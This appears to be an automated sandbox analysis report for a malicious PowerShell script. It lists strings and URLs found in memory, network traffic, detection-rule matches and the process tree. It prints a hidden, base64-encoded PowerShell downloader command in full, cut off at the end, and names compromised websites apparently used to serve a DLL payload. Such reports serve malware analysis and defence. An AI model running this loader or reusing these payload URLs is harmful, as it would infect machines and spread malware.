Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/feed/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/mike-daily-routine/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/our-team/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/call-to-action-box-animate-for-elementor/assets/css/eb-c
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/ele-custom-skin/assets/css/ecs-style.css?ver=3.1.0
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/ele-custom-skin/assets/js/ecs.js?ver=3.1.0
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/ele-custom-skin/assets/js/ecs_ajax_pagination.js?ver=3.1
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.1.1
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.2.3
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.2.3
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/images/placeholder.png
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eico
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.cs
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementskit-lite/modules/controls/assets/css/widgetarea-
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/cs
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/responsive.css?
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/widget-styles.c
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/header-footer-elementor/assets/css/header-footer-element
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/themes/astra/assets/css/minified/frontend.min.css?ver=3.1.2
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/themes/astra/assets/css/minified/menu-animation.min.css?ver=3.1.
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/themes/astra/assets/js/minified/flexibility.min.js?ver=3.1.2
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/WhatsApp-Image-2020-05-22-at-21.23.50-1-196x300.
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/WhatsApp-Image-2020-05-22-at-21.23.50-1.jpeg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-Logo-MG-100x98-1.png
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-cropped-cropped-Logo-MG-100x98-1-180x180
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-cropped-cropped-Logo-MG-100x98-1-192x192
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-cropped-cropped-Logo-MG-100x98-1-270x270
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-cropped-cropped-Logo-MG-100x98-1-32x32.p
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/client-206x300.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/client.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/dream-mdeia-206x300.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/dream-mdeia.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/olympia-1-207x300.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/olympia-1.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/proposal-202x300.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/proposal.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/script-201x300.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/script.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-1504.css?ver=1621160200
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-1525.css?ver=1621159702
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-207.css?ver=1615465769
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-494.css?ver=1621191965
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-6.css?ver=1621160200
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-892.css?ver=1621160200
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-includes/css/dist/block-library/style.min.css?ver=5.7.2
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-json/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/xmlrpc.php?rsd
Source: powershell.exe, 00000002.00000002.322999232.000001B6110BA000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.comx
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinckconsulting.com/
Source: powershell.exe, 00000002.00000002.323199850.000001B611210000.00000004.00000001.sdmp, A69S.dll.2.drString found in binary or memory: https://my.hintup.io
Source: powershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://olympiasoft.io/
Source: powershell.exe, 00000002.00000002.323183656.000001B6111FF000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://schema.org
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://schema.org/WebPage
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://script-creators.com/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/edog.com
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: https://www.baidu.com/
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000002.00000002.323183656.000001B6111FF000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/g
Source: A69S.dll.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=AW-562017657
Source: powershell.exe, 00000002.00000002.323199850.000001B611210000.00000004.00000001.sdmp, A69S.dll.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-143676173-1
Source: powershell.exe, 00000002.00000002.323147364.000001B6111A0000.00000004.00000001.sdmpString found in binary or memory: https://www.hintup.com.br
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in binary or memory: https://www.hintup.com.br/wp-content/dE/
Source: powershell.exe, 00000002.00000002.323147364.000001B6111A0000.00000004.00000001.sdmpString found in binary or memory: https://www.hintup.com.brx
Source: A69S.dll.2.drString found in binary or memory: https://www.hintup.io/images/og_image_diffstuff.png
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/mikegeerinck/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://www.mikegeerinck.com/blog/
Source: powershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmpString found in binary or memory: https://www.stmarouns.nsw.edu.au
Source: powershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: https://www.stmarouns.nsw.edu.au/paypal/b8G/
Source: powershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmpString found in binary or memory: https://www.stmarouns.nsw.edu.aux
Source: powershell.exe, 00000002.00000002.323199850.000001B611210000.00000004.00000001.sdmp, A69S.dll.2.drString found in binary or memory: https://www.tutorialrepublic.com/examples/images/clients/1.jpg
Source: A69S.dll.2.drString found in binary or memory: https://www.tutorialrepublic.com/examples/images/clients/3.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/channel/UCezyOaog07qIo-EMB_zABkw?view_as=subscriber
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownHTTPS traffic detected: 35.214.199.246:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.223.27:443 -> 192.168.2.3:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 143.204.98.64:443 -> 192.168.2.3:49740 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3DJump to dropped file

System Summary:

barindex
Very long command line foundShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5429
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5429Jump to behavior
Source: ps_script.ps1, type: SAMPLEMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.333177973.00000199B1C5D000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.333520412.00000199C97A3000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000003.328991391.00000199C97A3000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: classification engineClassification label: mal100.troj.evad.winPS1@4/15@9/7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210518Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoooqw21.rs0.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: ps_script.ps1Virustotal: Detection: 8%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\ps_script.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAK
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgA